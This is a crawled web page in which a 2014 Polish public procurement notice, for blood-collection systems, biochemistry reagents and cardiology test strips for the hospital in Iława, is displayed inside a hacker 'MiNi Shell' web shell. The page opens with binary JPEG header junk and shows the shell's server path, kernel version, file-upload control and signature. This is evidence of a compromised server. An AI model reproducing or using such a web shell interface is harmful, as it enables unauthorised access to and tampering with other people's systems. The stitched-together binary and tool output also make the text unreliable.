JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140514/162596-N-2014.html

<p class="kh_header"><b>Iława: Dostawa systemu aspiracyjno - próżniowego wraz z elementami systemu kapilarnego dostawa odczynników wraz z dzierżawą analizatora biochemicznego oraz dostawa testów paskowych wraz z dzierżawą aparatu do szybkiej diagnostyki kardiologicznej z podziałem na 3 zadania dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie ( nr sprawy 19/2014)</b><br>
<b>Numer ogłoszenia: 162596 - 2014; data zamieszczenia: 14.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie , ul. Gen. Wł. Andersa 3, 14-200 Iława, woj. warmińsko-mazurskie, tel. 89 6449601, faks 89 6492425.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> szpital.ilawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa systemu aspiracyjno - próżniowego wraz z elementami systemu kapilarnego dostawa odczynników wraz z dzierżawą analizatora biochemicznego oraz dostawa testów paskowych wraz z dzierżawą aparatu do szybkiej diagnostyki kardiologicznej z podziałem na 3 zadania dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie ( nr sprawy 19/2014).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa systemu aspiracyjno - próżniowego wraz z elementami systemu kapilarnego, dostawę odczynników wraz z dzierżawą analizatora biochemicznego oraz dostawę testów paskowych wraz z dzierżawą aparatu do szybkiej diagnostyki kardiologicznej z podziałem na 3 zadania dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie ( nr sprawy 19/2014)

Zadanie 1 System aspiracyjno- próżniowy z elementami systemu kapilarnego
Zadanie 2 Dostawa odczynników wraz z dzierżawą analizatora biochemicznego
Zadanie 3 Dostawa testów paskowych wraz z dzierżawą aparatu do szybkiej diagnostyki kardiologicznej.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.00-3, 33.69.65.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy 2. Wypełniony formularz specyfikacji przedmiotowej (formularz cenowy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>17.1 Strony dopuszczają zmiany treści umowy czasowe lub trwałe w trakcie jej obowiązywania,
 w przypadku:
1. zmiana dotyczy nieistotnych postanowień zawartej umowy,
2.  podczas realizacji umowy wystąpią nieprzewidywalne zdarzenia lub okoliczności, jak w szczególności klęski żywiołowe, strajki, zamieszki, konflikty zbrojne, które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie.
3. w wyniku istotnej zmiany stosunków spełnianie świadczenia byłoby połączone z nadmiernymi trudnościami lub groziłoby, co najmniej jednej ze stron znaczną stratą, a czego strony nie mogły przewidzieć przy zawarciu umowy - w przypadku istotnej zmiany stosunków takiej jak znaczny wzrost cen surowców, nośników energii itp.
4.zmiana dotyczy obniżenia cen jednostkowych poszczególnych elementów przedmiotu zamówienia 
- w przypadku promocji, ogólnej obniżki cen na dany asortyment itp.
5.dotyczy zmian koniecznych ze względu na zmianę powszechnie obowiązujących przepisów prawa, 
w szczególności stawek podatku VAT, stawek celnych - w przypadku zaistnienia takich zmian.
W przypadku zmiany podatku Vat cena brutto pozostaje bez zmian, zmianie ulega cena netto.
6.konieczność wprowadzenia zmiany wynika z okoliczności, których nie można było przewidzieć 
w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia.
17.2. Wprowadzenie zmian określonych w ust. 2 wymaga uzasadnienia konieczności zmiany i porozumienia stron oraz sporządzenia aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.ilawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2014 godzina 10:00, miejsce: Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> System aspiracyjno- próżniowy z elementami systemu kapilarnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Probówki plastikowe, z zakręcanym korkiem i naklejonymi etykietami z wyjątkiem probówko-strzykawek o średnicy 13 mm 
a) probówki o średnicy 13 mm bez etykiet
b) gwarancja wytworzenia próżni tuż przed pobraniem lub możliwość pobrania przez odciągnięcie tłoka
c) wystandaryzowane i zapewniające pobranie właściwej ilości krwi
d) szybkie wykrzepienie krwi
2.Igły systemowe, łączniki - pakowane pojedynczo, eliminujące wykrzepianie się krwi podczas
pobierania do kilku probówek
3.Igły motylkowe do posiewów z krwi umożliwiające bezpośredni przepływ krwi z naczynia 
krwionośnego do butelki z podłożem
4.Cały asortyment systemu zamkniętego i przygotowania krwi do analizy przedstawiony w pakiecie musi pochodzić od jednego producenta
5.Zamawiający zastrzega sobie prawo do żądania próbek celem sprawdzenia zgodności z siwz

6.Dzierżawa wirówki na okres trwania umowy warunki:
a) wirówka 24 m-cowa
b) wbudowany kalkulator
c) programator co najmniej 10 wariantów pracy
d) możliwość hamowania i przyspieszania w skali
e) silnik bezszczotkowy
f) rotor wychylny, sześcioramienny
1.	Probówko strzykawka do biochemii 7,5 - 8,0 ml i średnicy 14 - 15 mm	Szt.	1 200
2.	Probówko strzykawka do biochemii 5,0 - 5,5 ml i średnicy 14 - 15 mm	Szt.	70 000
3.	Probówko strzykawka do biochemii 2,5 -3,0 ml i średnicy 13 - 14 mm	Szt.	130 000
4.	Probówko strzykawka do biochemii 1,0 - 1,5 ml i średnicy 8,0 - 9,0 mm	Szt.	15 000
5.	Probówko strzykawka z He-Li 2,5 - 3,0 ml i średnicy 13 - 14 mm	Szt.	18 000
6.	Probówko strzykawka z He-Li 1,0 - 1,5 ml i średnicy 8,0 - 9,0 mm	Szt.	750
7.	Probówko strzykawka do morfologii 2,5 - 3,0 ml i średnicy 13 - 14 mm	Szt.	140 000
8.	Probówko strzykawka do morfologii 1,0 - 1,5 ml i średnicy 8,0 - 9,0 mm	Szt.	15 000
9.	Probówko strzykawka do morfologii 4,5 - 5,0 ml i średnicy 13 - 14 mm	Szt.	18 000
10.	Probówko strzykawka do koagulologii 2,5 - 3,0 ml i średnicy 13 - 14 mm	Szt.	50 000
11.	Probówko strzykawka do koagulologii 1,0 - 1,5 ml i średnicy 8,0 - 9,0 mm	Szt.	12 000
12.	Próbówko strzykawka do OB 1,5 - 2,0 ml i średnicy 13 - 14 mm + pipeta kalibrowana 	Kmpl.	27 000
13.	Probówko strzykawka do różnicowania małopłytkowości z jonami Mg 2,5 - 3,0 ml i średnicy 11 - 12 ml	Szt.	1 500
14.	Probówko strzykawka do glukozy 2,5 - 3,0 ml i średnicy 13 - 14 ml	Szt.	9 000
15.	Probówko strzykawka do gazometrii 1,0 - 2,0 ml l i średnicy 11 - 12 ml z filtrem odpowietrzającym	Szt.	6 000
16.	Igła systemowa 0,8; 0,9 mm długość 38 - 40 mm	Szt.	10 000
17.	Igła systemowa 0,8 mm długość 23 - 25 mm	Szt.	140 000
18.	Igła motylkowa 0,8; 0,9 mm z drenem do 80 mm	Szt.	30 000
19.	Igła motylkowa 0,8 mm na posiew krwi z drenem do 190 mm, pakowana pojedynczo	Szt.	1 500
20.	Probówko strzykawka do morfologii 7,0 - 7,5 ml i średnicy 14 - 15 mm	Szt.	200
21.	Zestaw do próżniowego pobierania moczu do 9,5 ml ze stożkowym dnem	Szt.	600
22.	Nakłuwacze automatyczne nożykowe - głębokość nakłucia do 1,8 mm	Szt.	18 000
23.	Otwieracz do drenów z krwią 	Szt.	5 000
24.	Adapter do posiewów 	Szt.	3 000
25.	Adapter na końcówkę LUERA ( do podłączenia z igłą systemową )	Szt.	1 500
26.	Adapter do końcówki LUERA ( do podłączenia z wenflonem, trójnikiem itp. )	Szt.	32 000
27.	Adapter z łopatką do rozmazów	Szt.	3 000
28.	Statywy autoklawowalne do probówko-strzykawek na 50 miejsc o średnicy do 17 mm	Szt.	30
29.	Mikrometoda do biochemii 200 ul z kapilarą	Szt.	5 000
30.	Mikrometoda do morfologii z EDTA 200 ul z kapilarą	Szt.	5 000
31.	Mikrometoda do OB 200 ul	Szt.	900
32.	Mikrometoda do koagulologii 1,0-1,3 ml	Szt.	400
33.	Dzierżawa wirówki laboratoryjnej z możliwością wirowania wszystkich zamawianych rozmiarów probówek na 36 mc	m-c	36
34.	Kontrola zewnątrz laboratoryjna - OB (6 razy zgodnie z harmonogramem laboratorium )	Szt.	6
35.	Kontrola zewnątrz laboratoryjna - retikulocyty manualnie ( 6 razy zgodnie z harmonogramem laboratorium )	Szt.	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa odczynników wraz z dzierżawą analizatora biochemicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ALT	Szt.	1000			
AST	Szt.	800			
Amylaza	Szt.	400			
Mocznik	Szt.	1000			
Kreatynina	Szt.	2000			
Kwas moczowy	Szt.	400			
Białko całkowite	Szt.	200			
Glukoza	Szt.	3000			
Cholesterol całkowity	Szt.	5000			
HDL cholesterol	Szt.	4000			
Trójglicerydy	szt. 	4000			
Bilirubina całkowita	Szt.	1000			
CRP	Szt.	2500			
Fosforany nieorg.	Szt.	200			
Żelazo	Szt.	500			
Magnez	Szt.	500			
Wapń całkowity	Szt.	500			
Hemoglobina glikolizowana ( HbA1C )	Szt.	2000			
Materiały kalibracyjne , materiały kontrolne, kuwety, części zużywalne, płyny myjące dla 29000 badań/16 miesiący ( należy wymienić i wycenić wszystkie niezbędne elementy dla 16 miesięcy i opisanej ilości i rodzajów badań)	Szt.	29 000 w wyliczeniu ilości płynów oraz materiałów zużywanych należy uwzględnić wykonanie 50 % badań jako próbkę pojedynczą			
Dzierżawa analizatora biochemicznego spełniającego wszystkie wymogi zamawiającego opisane poniższej tabeli	m-c	16 miesięcy			
Wymagane parametry analizatora biochemicznego służącego jako back up dla analizatora głównego z możliwością łatwego przetransportowania

Lp	Parametr	Wymóg	Parametr oferowany
TAK/NIE
1.	Analizator wieloparametrowy z możliwością zainstalowania w okresie późniejszym modułem ISE, wyposażony w zewnętrzny UPS o niewielkich wymiarach i wadze do 75 kg włącznie, do postawienia na stole.
Analizator nowy, rok produkcji 2013 lub 2014	TAK, podać typ (model), wagę, rok produkcji oraz producenta oferowanego analizatora	
2.	Metody pomiaru:
fotometryczne monochromatyczne i bichromatyczne punktu końcowego i kinetyczne , turbidymetryczne
ISE : Na, K, Cl 	TAK	
2.		Pomiar ISE za pomocą bezobsługowych elektrod jonoselektywnych - metodą pośrednią	TAK	
4.	Możliwości analityczne :
- Biochemia - enzymy, substraty, ISE
- Białka specyficzne	TAK	
5.	Analiza w fazie ciekłej	TAK	
6.	System odczynnikowy otwarty lub zamknięty	TAK	
7.	Odczynniki gotowe do użycia 
Odczynniki gotowe do użycia, bez konieczności przelewania czy mieszania składników poza analizatorem 	TAK	
8.	Analizator w pełni automatyczny pracujący w trybie pacjent po pacjencie	TAK	
9.	Możliwość wykonywania badań w surowicy , osoczu , moczu , krwi pełnej i hemolizacie	TAK	
10.	Identyfikacja odczynników z wykorzystaniem kodów kreskowych	TAK	
11.	Parametry aplikacji dla testów z czytywane z kodów kreskowych używanych odczynników	TAK	
12.	Chłodzenie odczynników na pokładzie analizatora	TAK	
13.	Możliwość zlecania ,wykonywania testów pojedynczych, grup testów - tzw. profili, prób cito	TAK	
14.	Powtórka oznaczanej próbki, po przekroczeniu liniowości metody	TAK	
15.	Priorytetowe badanie próbek cito	TAK	
16.	Możliwość identyfikowania próbek z kodów kreskowych	TAK	
17.	Możliwość stałego monitorowania poziomu odczynników i kuwet	TAK	
18.	Jednoczesna dostępność na pokładzie minimum 13 różnych testów	TAK	
19.	Możliwość ciągłego podawania próbek bez przerywania pracy analizatora	TAK	
20.	Kuwety pomiarowe jednorazowego użytku	TAK	
21.	Zużycie wody uzdatnionej do 2 l/ dzień pracy, bez konieczności instalacji stacji uzdatniania wody.	TAK	
22.	Możliwość połączenia analizatora z zewnętrznym systemem komputerowym, pełna dwustronna komunikacja	TAK	
23.	Możliwość prowadzenia kontroli jakości bieżącej, skumulowanej w analizatorze minimum 1 miesiąc	TAK	
24.	Automatyczny terminarz wymaganych czynności obsługowych zapisany w oprogramowaniu analizatora	TAK	
25.	Komputer zewnętrzny, monitor, klawiatura i inne niezbędne elementy do zapewnienia prawidłowej współpracy z systemem LAB 3000 i obsługą aparatu	TAK	
26.	Analizator i zestawy odczynnikowe pochodzące od jednego producenta	TAK
Uwaga: niespełnienie co najmniej jednego wymogu opisanego w powyższej tabeli spowoduje odrzucenie oferty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa testów paskowych wraz z dzierżawą aparatu do szybkiej diagnostyki kardiologicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Troponina 	Szt.	200
D-Dimer	Szt.	100
CK-MB mas	Szt.	15
Mioglobina 	Szt.	15
Pro-BNP	Szt.	5
Ilość kontroli dostosowana do ilości badań na okres 12 miesięcy 	Szt.	(ilość badań określa Wykonawca w zależności od specyfiki zaoferowanego urządzenia)
Dzierżawa analizatora spełniającego wszystkie wymagania opisane poniższej tabeli na 12 miesiące 	m-c	12
lp.	Warunki graniczne aparatu:
	Wymóg	Parametr oferowany
TAK/NIE
1.	Analizator wykonujący ilościowe oznaczenia : Troponiny T , Mioglobiny , D- Dimerów, NT-proBNT i CK-MB	TAK	
2	Metoda pomiaru immunochemiczna	TAK	
3	Materiał do badań :krew pełna ,żylna heparynizowana ( heparyna litowa )	TAK	
4	Pamięc dla wyników pacjentów  ( min.15 )	TAK	
5	Pamięć dla wyników kontroli  ( min. 15 )	TAK	
6	Czas uzyskania wyniku max. do 12  minut	TAK	
7	Mała objętość próbki do 200 ul	TAK	
8	Testy paskowe  pakowane pojedyńczo	TAK	
9	Testy paskowe z polem potwierdzającym poprawność wykonania oznaczenia 	TAK	
10	Kalibracja testów elektroniczna, elektroniczny chip lub kod  kodujący kalibrację w każdym opakowaniu testów	TAK	
	Zakres pomiarowy dla poszczególnych testów nie mniej niż :
Zakres pomiarowy dla Troponiny T: 100 - 2000 ng/L
Zakres pomiarowy dla Mioglobiny: 30 - 700 ng/ml
Zakres pomiarowy dla NT proBNP: 60 - 9000 pg/ml 
Zakres pomiarowy dla D-Dimerów: 0,1 - 4,0 ?g/ml
Zakres pomiarowy dla CK-MB: 1,0 - 40 ng/ml	TAK	
11	Testy w postaci  pasków gotowych  do użycia zaraz po wyjęciu z lodówki 	TAK	
12	Gwarancja oraz bezpłatny serwis na czas trwania umowy	TAK	
Uwaga: niespełnienie co najmniej jednego wymogu opisanego w powyższej tabeli spowoduje odrzucenie oferty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.54.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com